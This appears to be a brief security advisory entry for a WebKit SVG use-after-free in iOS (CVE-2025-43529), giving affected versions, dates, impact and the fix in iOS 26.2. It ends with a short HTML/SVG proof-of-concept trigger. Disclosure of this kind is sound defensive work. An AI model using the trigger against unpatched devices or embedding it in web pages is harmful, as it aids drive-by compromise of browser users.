CVE-2025-43529 | iOS | RCE | Critical
WebKit Use-After-Free arbitrary code
- affected: < 26.2
- disclosed: 2025-12-15
- discovered: 2025-10-10
- patched: iOS 26.2
- author: Apple Security
- platform: iOS
## description
A Use-After-Free vulnerability in WebKit's SVG rendering component allows for arbitrary code execution during web content processing.
## impact
Drive-by RCE inside Safari renderer.
## mitigation
Update to iOS 26.2 or later.
## proof of concept
```html
<!-- SVG UAF Trigger -->
<svg>
  <use href="#target" id="uaf" />
  <g id="target" />
  <script>
    document.getElementById('target').remove();
    document.getElementById('uaf').getBoundingClientRect(); // trigger UAF
  </script>
</svg>
```